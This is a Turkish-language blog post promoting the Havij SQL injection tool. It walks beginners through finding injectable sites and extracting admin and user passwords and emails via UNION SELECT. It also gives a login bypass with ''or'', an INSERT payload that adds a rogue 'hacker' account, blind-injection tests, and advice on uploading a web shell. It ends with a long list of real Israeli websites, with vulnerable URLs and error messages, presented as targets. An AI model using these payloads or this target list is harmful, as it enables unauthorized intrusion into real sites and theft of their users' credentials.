Sql Açığı İle Site Hackleme Programı (Havij)



Merhaba teknogam okurları bugün size sql açığı ile site hackleyen bir program tanıtacağım.

Şimdi siz bu makaleyi okurken sql açığının ne olduğu aklınızda soru işareti bırakıyor.hemen anlatayım :))

sql açığı nedir?
öncelikle açık tarama programlarını bir kenara atın.
bu noktada bir çok sorumuz olacak
sql açığı nedir
sql kritik bir açıktır gizli kalması gereken bilgilere ulaşılması anlamınada gelmektedir.kullanıcı bilgileri gibi örnek verecek olursak admin şifresi
peki ya açığı nasıl bulucaz
sql açığını genelde ’a ile buluruz örnek vereyim hemen
www.site54.com’a
peki bu tek tırnak ne işe yarıyor onuda anlatayım.kafamızda soru kalmasın
sql de amaç hata verdirmektir bizde bu tek tırnak işaretimizle hatayı verdiriyoruz.
aşağıdaki gibi bir hata örneğin siz daha kapsamlı araştırın tavsiyem security tv bölümüdür ordaki videoları izleyin
peki hatayı verdirdik sonra ne yapıyoruz.
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark before the character string "",
databank/login.asp,line 5
kolon sayısını bulmamız gerekmektedir.
nasılmı
order+by+kolon sayısı deneme yanılma ile sql kolon sayısı 11 olsun
şu şekilde devam ediyoruz...
union+select+,1,2,3,4,5,6,7,8,9,10,11+from+admin veya users veya member bu siteye göre değişir admin olsun.farkettiyseniz 11 dahil değil çünkü 0 da var.
admin password ve kullanıcı adı ekrana vurdu diyelim.
union+select+,1,2,password,4,admin,6,7,8,9,10,11+f rom+admin
görüldüğü gibi password ve admin şifresi elimizde ilk üyeyi çekmek için
top+1 kullanıyoruz.örnekle daha iyi anlayacaksınız..
http://www.site54.com/new/admin.asp?...11+from+member
selecten sonra top+1 yazıyoruz.
şimdi arkadaşlar bu ilk üyeyi çekmemize yarar.sadece admini değil diğer kullanıcılarında şifrelerine ulaştığınızı varsayın.
email çekelim birde
8 yerine email yazıyoruz.
peki arkadaşlar buraya kadar herşey tamam bittimi sadece urldenmi saldırabiliyoruz. hayırrr
devamı var sıkıldınızmı okumaya devam yeni başlayanlar
arkadaşlar where+like+select komutuna girmiyorum kafanız karışmasın .
kullanıcıların veri girişi yaptıkları yer yani web formlarındanda saldırabiliriz.
örnek vereyim bunada bir tane
kullanıcı adı:’or’
şifre:’or’
bir diğer adı kimlik doğrulayarak geçmek.
bunun dorkunuda vereyim
’or’+uname
evet arkadaşlar mysql mssql bunlara girmiyorum siz kapsamlı araştırın.birde şunu bilin mysql ve mssql dede kolon sayısını aynı şekilde buluyorsunuz.. forumda yeterli döküman mevcuttur tavsiyem el_muhammed ve the_mıller
sql enjeksiyon ile veritabanına yazı yazmayı göstereyim birde konuyu bitireyim.
having komutu ile veritabanı veritabanı üzerinde tablo ve kolon isimlerini öğrenen saldırgan bundan sonraki aşamada veritabanına kayıt eklemeye çalışacaktır.bu noktada ise insert komutu ile veri kaydedebilir.
örnek:
kullanıcı adı:’;insert into userinfo values (hacker’,’hacker’);--
şifre:’;insert into userinfo values (hacker’,’hacker’);--
yukarıda verdiğim komut veritabanı üzerinde bulunan userinfo adlı tabloya hacker isimli kullanıcı adı ve hacker isimli bir şifre ekleyebilir.birde blind sql den hacked yapanların kulakları çınlasın.
blind sql de sayfada hata vermemektedir arkadaşlar bunu bilin.
and+1=1
and+1=0
ile sayfa değişmektedir sadece... bu da sql olduğu anlamına gelir videoları izlerseniz daha iyi anlayacaksınız.
inşAllah yakında bunlar hakkında videoda çekeceğim ama konumuz bu değil size şimdilik havij programından basedecem.kafanızda soru kalmasın.birazda shell den bahsedeğim sql ile shelli arkadaşlar admin yerine giriş yaptıktan sonra upload yerini bulmanız gerekmektedir.ve shelli çaktıktan shell yolumuzu yazar adrese gireriz.bu şekilde serverda root oluruz veya olmayız bu size kalmış.


Havij Videolu Anlatım:

Havij programını size resimli olarak anlatırsam aklınız biraz karışabilir en iyisi videolu anlatarak hem resimli hem sesli daha iyi anlarsınız


Sql Açıklı İsrail Siteleri:
  1. http://biglove.co.il/articles.php?mode=showItem'&sectionID=36'&id=196' |error in your SQL syntax|
  2. http://bonk.co.il/articles.php?id=234' |error in your SQL syntax|
    http://eisenberg-group.co.il/articles.php?id=5' |mysql_num_rows()|
    http://****plim.alternativli.co.il/listing_gallery.php?id=4221' |error in your SQL syntax|
    http://tamar.co.il/site/index.php?ln=en'&main_id=1' |error in your SQL syntax|
    http://www.bonk.co.il/articles.php?id=199' |error in your SQL syntax|
    http://www.bonk.co.il/event.php?id=205' |error in your SQL syntax|
    http://www.eisenberg-group.co.il/articles.php?id=2' |mysql_num_rows()|
    http://www.etnika.co.il/intro.php' |mysql_fetch_assoc()|
    http://www.haogenplast.co.il/index.php?page_id=1' |mysql_num_rows()|
    http://www.konimolam.co.il/product.asp?productid=930' |Microsoft VBScript|
    http://www.mikro.co.il/index.php?id=15%5D' |error in your SQL syntax|
    http://www.ochel.co.il/articles.php?id=1' |error in your SQL syntax|
    http://www.ornetpower.co.il/en/news.php?id=289' |error in your SQL syntax|
    http://www.printmaking.co.il/artists.php?id=47' |mysql_num_rows()|
    http://www.reading3.co.il/venue.php?item_id=101' |error in your SQL syntax|
    http://www.thinklikeazebra.co.il/news/view.asp?id=29' |OLE DB Provider for ODBC|
    http://www.yamit2000.co.il/content.php?id=28' |mysql_fetch_array()|
    http://www.zalman.co.il/page.php?id=167' |error in your SQL syntax|
    http://eisenberg-group.co.il/articles.php?id=1' |mysql_num_rows()|
    http://lakekinneret.co.il/articles.php?lang=2'&sector=minhelet'&id=all'&page =5' |error in your SQL syntax|
    http://rexe.co.il/articles.php?type=write_us'&id=53'&branch_id=13' |error in your SQL syntax|
    http://www.atid-ltd.co.il/articles.php?id=287' |error in your SQL syntax|
    http://www.baby-bis.co.il/Articles.php?article_order=hotPriority=0,%2520hotP riority,%2520dateCreate%2520DESC'&id=articles_nutr ition'&sArticle='&curLim=0' |error in your SQL syntax|
    http://www.biglove.co.il/articles.php?mode=showItem'&sectionID=36'&id=317' |error in your SQL syntax|
    http://www.kineret.org.il/articles.php?lang=2'&id=6'&sector=default'&menu=16 4' |error in your SQL syntax|
    http://www.lakekinneret.co.il/articles.php?id=7'&sector=edu'&page=2' |error in your SQL syntax|
    http://www.marcus-realestate.co.il/english/articles.php?cat_id='&id=86' |error in your SQL syntax|
    http://www.ochel.co.il/articles.php?id=11' |error in your SQL syntax|
    http://www.rexe.co.il/articles.php?type=news'&id=55' |error in your SQL syntax|
    http://www.bsf.org.il/bsfpublic/DefaultPage1.aspx?PageId=2'&innerTextID=2'
    http://www.ecb.co.il/Page.aspx?PageID=624'
    http://traumaweb.secured.co.il/content.asp?PageId=31'&lang=En'
    http://bbl.co.il/team.asp?pageid=43'
    http://www.bental.co.il/template/default.aspx?PageId=28'&parentId=64'&catId=3'&main cat=1'
    http://www.cancer.org.il/template/default.aspx?PageId=8236'
    http://www.e-jewel.co.il/en/Site_Page_number.aspx?PageID=187'
    http://www.yaafcnc.co.il/page.asp?PageID=63'
    http://alma.org.il/content.asp?pageid=8'&lang=en'
    http://www.vaqueiro.co.il/Content.aspx?PageId=6'
    http://www.shenkar.ac.il/english/template/default.aspx?PageId=19'&catId=28'&maincat=5'
    http://www.transglobal.co.il/page.php?pageID=35'
    http://www.modiin.muni.il/ModiinWebSite/ChannelArticle.aspx?PageID=99_341'
    http://www.artdepot.co.il/default1.asp?PageID=2'
    http://mishkenot.org.il/hebrew/HebEthicsPagesContent.aspx?pageId=30'
    http://www.lev-tlv.co.il/default.asp?pageid=17'
    http://www.hop.co.il/Items.aspx?pageid=4'
    http://eshalit.co.il/eshali/pages.aspx?pageid=9'
    http://neaman-front.technion.ac.il/AlbumCategory.aspx?pageID=piGalleries'&cId=93'&aId =1'
    http://www.aclp.co.il/page.asp?pageID=81'&lang=en'
    http://www.dt-law.co.il/en/page.asp?PageID=14'
    http://eshnav.org.il/default.asp?PageID=53'
    http://www.shivyon.org.il/Default.asp?PageId=64679'
    http://www.zer-shokolad.co.il/page.asp?PageID=25'
    http://www.rnkishon.co.il/innerpage.asp?Pageid=128'


Sorunlarınızı yorumdan cevaplıyabilirim.